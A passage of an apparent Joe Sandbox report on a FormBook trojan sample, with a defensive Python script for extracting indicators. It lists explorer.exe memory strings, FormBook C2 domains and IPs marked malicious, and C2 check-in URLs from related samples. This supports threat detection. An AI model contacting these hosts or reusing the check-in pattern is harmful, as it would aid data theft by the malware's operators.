                                                        http://www.microsoft.cexplorer.exe, 00000003.00000003.2284258372.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://android.notify.windows.com/iOSdexplorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.scheuermannworks.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.beatricesswarthout.xyz/ns03/www.engagenotrage.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.velvetgloveseasonings.store/ns03/www.gildedbeautyaesthitics.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.beatricesswarthout.xyzReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.elizabethsbookshelf.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.elizabethsbookshelf.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.maxhealthunity.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.leclandesparents.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.agathis.fun/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.maxhealthunity.com/ns03/www.fonbnk.proexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.scheuermannworks.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.scheuermannworks.com/ns03/www.fichaphuman.netexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.yedxec.xyz/ns03/www.chuanruhaomen.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://outlook.comexplorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.yedxec.xyzReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.cloudflare.com/5xx-error-landingexplorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.engagenotrage.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.leclandesparents.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.repair-services.todayReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.scheuermannworks.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.repair-services.todayexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.fonbnk.pro/ns03/www.scheuermannworks.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
Source groups (the explorer.exe memory dumps in which each URL string was found):
Group A: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp
Group B: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp
Group C: explorer.exe, 00000003.00000002.3832797190.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1373381409.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1378345938.0000000007720000.00000002.00000001.00040000.00000000.sdmp
Group D: explorer.exe, 00000003.00000003.3076012374.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp

URL (string as found in memory) | Source | Malicious | Antivirus detection | Reputation
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | Group A | false | | high
http://www.fichaphuman.netReferer: | Group B | false | Avira URL Cloud: safe | unknown
http://www.fichaphuman.net/ns03/www.elizabethsbookshelf.com | Group B | false | Avira URL Cloud: safe | unknown
http://www.engagenotrage.com/ns03/www.velvetgloveseasonings.store | Group B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | Group A | false | | high
http://www.taiyuanbaoyang.comReferer: | Group B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi | Group A | false | | high
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b | Group A | false | | high
http://schemas.micro | Group C | false | URL Reputation: safe | unknown
http://www.elizabethsbookshelf.comReferer: | Group B | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | Group A | false | | high
http://www.fonbnk.proReferer: | Group B | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/EM0 | Group D | false | | high
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt | Group A | false | | high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | Group A | false | | high
http://www.chuanruhaomen.com | Group B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it | Group A | false | | high
http://www.grupooceanique.com/ns03/www.repair-services.today | Group B | false | Avira URL Cloud: safe | unknown
http://www.grupooceanique.comReferer: | Group B | false | Avira URL Cloud: safe | unknown
http://www.fichaphuman.net | Group B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | Group A | false | | high
http://www.beatricesswarthout.xyz/ns03/ | Group B | false | Avira URL Cloud: safe | unknown
http://www.agathis.fun/ns03/www.grupooceanique.com | Group B | false | Avira URL Cloud: safe | unknown
http://www.fichaphuman.net/ns03/ | Group B | false | Avira URL Cloud: safe | unknown
http://www.agathis.fun | Group B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | Group A | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k | Group A | false | | high
http://www.chuanruhaomen.comReferer: | Group B | false | Avira URL Cloud: safe | unknown
http://www.repair-services.today/ns03/www.taiyuanbaoyang.com | Group B | false | Avira URL Cloud: safe | unknown
http://www.elizabethsbookshelf.com/ns03/www.leclandesparents.com | Group B | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.25 | gildedbeautyaesthitics.com | United States | 2635 | AUTOMATTIC (US) | true
172.67.171.253 | www.beatricesswarthout.xyz | United States | 13335 | CLOUDFLARENET (US) | true
172.67.146.200 | www.repair-services.today | United States | 13335 | CLOUDFLARENET (US) | true
172.67.160.57 | www.taiyuanbaoyang.com | United States | 13335 | CLOUDFLARENET (US) | true
15.197.142.173 | maxhealthunity.com | United States | 7430 | TANDEM (US) | true
208.91.197.27 | www.scheuermannworks.com | Virgin Islands (British) | 40034 | CONFLUENCE-NETWORK-INC (VG) | true
104.21.23.10 | www.agathis.fun | United States | 13335 | CLOUDFLARENET (US) | true
216.40.34.41 | www.velvetgloveseasonings.store | Canada | 15348 | TUCOWS (CA) | true
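The two tables above list the URL strings carved from explorer.exe memory and the hosts that resolved during the run. The script below is an added example, not part of the Joe Sandbox report: it separates the FormBook check-in pattern (a short path tag such as /ns03/, which in memory is often followed directly by the next domain of the rotation list, while a bare domain is often followed by the adjacent "Referer:" header text) from the benign msn.com and WNS strings that explorer.exe holds anyway, cross-references the candidates with the hosts that resolved, and decodes the .sdmp dump identifiers. The URL and IP values are copied from the report; the meaning assigned to the dump-identifier fields (VirtualQuery protection and type constants) is an assumption, as are the helper names.

```python
"""Pull FormBook C2 indicators out of Joe Sandbox memory-string URLs.

Added example, not Joe Sandbox code or output. MEMORY_URLS and RESOLVED are
copied from this report's URL and IP tables; the field layout assigned to the
.sdmp dump identifiers is an assumption about Joe Sandbox's naming scheme.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# URL strings copied from the report's URL table (explorer.exe memory).
MEMORY_URLS = [
    "http://www.fichaphuman.netReferer:",
    "http://www.fichaphuman.net/ns03/www.elizabethsbookshelf.com",
    "http://www.engagenotrage.com/ns03/www.velvetgloveseasonings.store",
    "http://www.taiyuanbaoyang.comReferer:",
    "http://www.beatricesswarthout.xyz/ns03/",
    "http://www.agathis.fun/ns03/www.grupooceanique.com",
    "http://www.repair-services.today/ns03/www.taiyuanbaoyang.com",
    "http://www.elizabethsbookshelf.com/ns03/www.leclandesparents.com",
    "https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09",
    "https://wns.windows.com/EM0",
    "http://schemas.micro",
]

# Domain -> IP pairs copied from the report's IP table.
RESOLVED = {
    "www.beatricesswarthout.xyz": "172.67.171.253",
    "www.repair-services.today": "172.67.146.200",
    "www.taiyuanbaoyang.com": "172.67.160.57",
    "www.agathis.fun": "104.21.23.10",
    "www.velvetgloveseasonings.store": "216.40.34.41",
}

# FormBook check-in URLs look like "<domain>/<short tag>/"; in a memory carve
# the tag path is frequently followed by the next domain of the rotation list.
C2_PATH = re.compile(r"^/([a-z0-9]{2,6})/(www\.[^/\s]+)?$")


def c2_domains(urls):
    """Return (sorted candidate C2 domains, sorted path tags) from memory strings."""
    domains, tags = set(), set()
    for s in urls:
        s = s.removesuffix("Referer:")            # strip adjacent-header residue
        parts = urlsplit(s)
        m = C2_PATH.match(parts.path)
        if not m or not parts.hostname:
            continue                              # msn.com / WNS strings fall out here
        tags.add(m.group(1))
        domains.add(parts.hostname)
        if m.group(2):                            # chained "next domain" from the list
            domains.add(m.group(2))
    return sorted(domains), sorted(tags)


def resolved_c2(domains, resolved=RESOLVED):
    """Candidates that actually resolved during the run: the live part of the list."""
    return {d: resolved[d] for d in domains if d in resolved}


@dataclass(frozen=True)
class DumpId:
    process_index: int
    base: int
    protect: str
    mem_type: str


# ASSUMPTION: the 5th and 7th dump-name fields are the region's VirtualQuery
# protection and type (PAGE_* / MEM_*). Treat as a hypothesis, not documented fact.
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_dump_id(name):
    """Decode '<proc>.<phase>.<counter>.<base>.<protect>.<flag>.<type>.<x>.sdmp'."""
    fields = name.removesuffix(".sdmp").split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump id: {name}")
    protect, mem_type = int(fields[4], 16), int(fields[6], 16)
    return DumpId(
        process_index=int(fields[0], 16),
        base=int(fields[3], 16),
        protect=PAGE.get(protect, hex(protect)),
        mem_type=MEM_TYPE.get(mem_type, hex(mem_type)),
    )


if __name__ == "__main__":
    domains, tags = c2_domains(MEMORY_URLS)
    print("path tag(s):", tags)
    for d in domains:
        print(f"{d:40} {resolved_c2([d]).get(d, '-')}")
    print(parse_dump_id("00000003.00000002.3834090236.0000000009255000"
                        ".00000004.00000001.00020000.00000000.sdmp"))
```

Run as a script it prints the ten candidate domains (tag ns03) with the five that resolved during the run. The dump-identifier decode is what backs the attribution: under the assumed field layout, every C2 string sits in PAGE_READWRITE / MEM_PRIVATE memory at 0x9255000 in explorer.exe, i.e. a private writable region populated after injection, whereas the schemas.micro string sits in PAGE_READONLY / MEM_MAPPED memory, which is where the strings of a mapped file would be.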
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1410995
Start date and time: 2024-03-18 14:40:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: duGqHKp0OUXaX1D.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@144/1@11/8
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 104
• Number of non-executed functions: 285
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: duGqHKp0OUXaX1D.exe
Time | Type | Description
14:41:09 | API Interceptor | 1x Sleep call for process: duGqHKp0OUXaX1D.exe modified
14:41:19 | API Interceptor | 7498991x Sleep call for process: explorer.exe modified
14:41:57 | API Interceptor | 7641785x Sleep call for process: help.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.0.78.25 | International Bank Transfer.exe | malicious | FormBook | www.voyagedebetterave.com/ve92/?KVvTZtEp=SKXwm0mP5osv+tB3n7pxaJIuZ2gns/beRRSaI9loB4VQNRcKjWpGz3LlPIL/LOa7b1KdZakZ+A==&ixo=GL0X
192.0.78.25 | NfNXiX42uQ.exe | malicious | FormBook | www.burduremlakilan.com/jk56/?ndfxyf=R2Jd4&Jd7H=vUHa4t/MdhdOwuVCvD8uyvIDFi6LExMKoOKM/kOuD2lIQwvS7J46LAC2Okr9THJErjNM
192.0.78.25 | Factura_de_proforma_pdf.exe | malicious | FormBook | www.slimshotonline.com/ey16/?xnMtsxw8=A/o10+Me4fvA+hta8k/hrhXphMSeIGQKvha56Qk62/qkqyp619OkBa+Em/4N0fL2+Mt4Err+Lw==&1bkpfB=R2MxBTeXnBq
192.0.78.25 | jYRjr28sHR.exe | malicious | FormBook | www.lajtuf.com/bp31/
192.0.78.25 | PGiUp8uqGt.exe | malicious | FormBook | www.illuminati4me.com/btrd/?2dz=odelT&-Z1dnr=Q3kWi+8g+tbDAN4znzTYQaSHZDljXDmr3SwP0PohYWX18fCHdmrKk2iHJyaTwrNQ+JWy
192.0.78.25 | JLavGK0bZb.exe | malicious | FormBook | www.lithuaniandreamtime.com/4hc5/?VJEp=utxH9pwhq8XTGdt&FR3pw2=cbyLg/+yG8SQmnyN+ojfiN3a+JzSxQPEYaknOMddy8kPHpC/VJwUPcNk7jURfSy4thzO4h4zNA==
192.0.78.25 | qn69nWdSQs.exe | malicious | FormBook | www.illuminati4me.com/btrd/?DJE00XC=Q3kWi+8g+tbDAN4znzTYQaSHZDljXDmr3SwP0PohYWX18fCHdmrKk2iHJx6M7Ldokur4&pN9=DXj4tZAh6XiT_JF
